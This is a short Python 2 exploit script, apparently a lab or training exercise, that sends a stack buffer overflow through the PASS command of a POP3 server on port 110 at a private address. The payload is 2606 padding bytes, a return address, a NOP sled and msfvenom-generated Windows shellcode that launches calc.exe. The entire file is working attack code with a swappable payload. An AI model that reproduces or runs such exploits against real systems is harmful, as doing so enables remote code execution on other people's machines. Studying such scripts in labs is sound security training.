#!/usr/bin/python
#buffer to remain 3000 bytes

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

#popcalc 220 bytes msfvenom -p windows/exec cmd=calc.exe -a x86 -f python -b '\x00\x0a\x0d'
buf =  ""
buf += "\xbe\x9a\xc7\x48\x31\xda\xc0\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x77\x0f\x03\x77\x95\x25"
buf += "\xbd\xcd\x41\x2b\x3e\x2e\x91\x4c\xb6\xcb\xa0\x4c\xac"
buf += "\x98\x92\x7c\xa6\xcd\x1e\xf6\xea\xe5\x95\x7a\x23\x09"
buf += "\x1e\x30\x15\x24\x9f\x69\x65\x27\x23\x70\xba\x87\x1a"
buf += "\xbb\xcf\xc6\x5b\xa6\x22\x9a\x34\xac\x91\x0b\x31\xf8"
buf += "\x29\xa7\x09\xec\x29\x54\xd9\x0f\x1b\xcb\x52\x56\xbb"
buf += "\xed\xb7\xe2\xf2\xf5\xd4\xcf\x4d\x8d\x2e\xbb\x4f\x47"
buf += "\x7f\x44\xe3\xa6\xb0\xb7\xfd\xef\x76\x28\x88\x19\x85"
buf += "\xd5\x8b\xdd\xf4\x01\x19\xc6\x5e\xc1\xb9\x22\x5f\x06"
buf += "\x5f\xa0\x53\xe3\x2b\xee\x77\xf2\xf8\x84\x83\x7f\xff"
buf += "\x4a\x02\x3b\x24\x4f\x4f\x9f\x45\xd6\x35\x4e\x79\x08"
buf += "\x96\x2f\xdf\x42\x3a\x3b\x52\x09\x50\xba\xe0\x37\x16"
buf += "\xbc\xfa\x37\x06\xd5\xcb\xbc\xc9\xa2\xd3\x16\xae\x5d"
buf += "\x9e\x3b\x86\xf5\x47\xae\x9b\x9b\x77\x04\xdf\xa5\xfb"
buf += "\xad\x9f\x51\xe3\xc7\x9a\x1e\xa3\x34\xd6\x0f\x46\x3b"
buf += "\x45\x2f\x43\x58\x08\xa3\x0f\xb1\xaf\x43\xb5\xcd"

buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * (4) + buf + "D" * (170)

try:
	print "\nSending evil buffer..."
	s.connect(('192.168.1.192',110))
	data = s.recv(1024)
	s.send('USER username' +'\r\n')
	data = s.recv(1024)
	s.send('PASS ' + buffer + '\r\n')
	print "\nDone!."
except:
    print "Could not connect to POP3!"